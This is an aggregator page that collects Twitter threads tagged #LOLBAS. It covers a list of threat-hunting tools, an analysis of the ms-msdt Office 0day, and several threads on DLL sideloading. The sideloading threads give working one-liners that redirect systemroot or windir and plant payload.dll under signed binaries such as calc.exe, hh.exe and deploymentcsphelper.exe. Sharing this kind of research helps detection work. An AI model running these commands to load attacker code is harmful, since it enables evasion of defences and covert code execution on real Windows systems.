Discover and read the best of Twitter Threads about #LOLBAS

Most recents (5)

1/ I am taking a little break but couldn’t resist checking-out my favourite open-source projects for any updates. Doing so, I thought it will be useful to share my top 10 projects that anyone in the #infosec field should know about. Here they are 🧵:
2/ 📊 HELK (buff.ly/3BHn9iR): The Hunting ELK (HELK) project provides an analytics and threat hunting platform for security teams to identify and respond to threats in their environment. Just load your logs and start hunting! #HELK #ThreatHunting Image
3/ 🔍 Sigma(buff.ly/3q12WOC ): Sigma enables infosec peeps to create rules for SIEM systems for detecting and responding to security incidents. It also allows us to share our rules in a non-vendor-specific format! Free detections anyone!?! #Sigma #SIEM
Read 13 tweets
#lolbin #lolbas (again cuz i messed up the oneliner on the previous attempt) load a DLL of your choice with calc.exe. Oneliner: mkdir C:\x\system32&set systemroot=C:\x&copy /y payload.dll %systemroot%\system32\propsys.dll&C:\Windows\System32\calc.exe
hh would do so too. but for hh an argument has to be provided (as you can see in the screenshot it didn't try loading anything on the first run w/o the help switch); mkdir C:\x\system32&set systemroot=C:\x&copy /y payload.dll %systemroot%\system32\propsys.dll&C:\windows\hh.exe /?
but there's this annoying ui that loads on a different thread than our msgbox; seems like dataexchange.dll is supposed to load earlier, so this is w/o ui: mkdir C:\x\system32&set systemroot=C:\x&copy /y payload.dll %systemroot%\system32\dataexchange.dll&C:\windows\hh.exe /?
Read 3 tweets
Some #lolbins [likely hw-related] call igc64.dll (Intel Graphics Shader Compiler for Intel(R) Graphics Accelerator), which then tries to LoadLibraryA on rasty_jitter64.dll (obviously from either CWD or %PATH%). Just export JitCreateCompilerData & run phoneactivate.exe toloadurdll
same with filehistory
And to avoid showing up any UI, call ExitProcess when done.
Read 10 tweets
Load your DLL payload with a MS-signed executable; deploymentcsphelper.exe, by setting %windir% to C:\dummy and planting your lib as dbghelp.dll under system32 of that dummy folder #lolbin #lolbas
Same with djoin.exe
and dnscacheugc.exe
Read 11 tweets
OK, now that I have access to a computer, let's take a look at this Office 0day that folks are talking about.
It's very similar to the MSHTML CVE-2021-40444 vul from September:
1) Use of '!' at the end of the retrieved URI
2) Size of retrieved HTML must be 4096 bytes or larger
The important difference is that this variant still works.
Let's look at the preview pane attack vector, like we did for CVE-2021-40444 since that one is more fun. Protected View be damned!
Here is Office 2019 on Win10, both with May 2022 updates.
While there very may well be other dangerous protocols besides ms-msdt:, it's probably a good idea to unregister this protocol. Especially while this vulnerability is still unpatched!
I've never seen its use in the real world until today.
gist.github.com/wdormann/03196…
Read 17 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!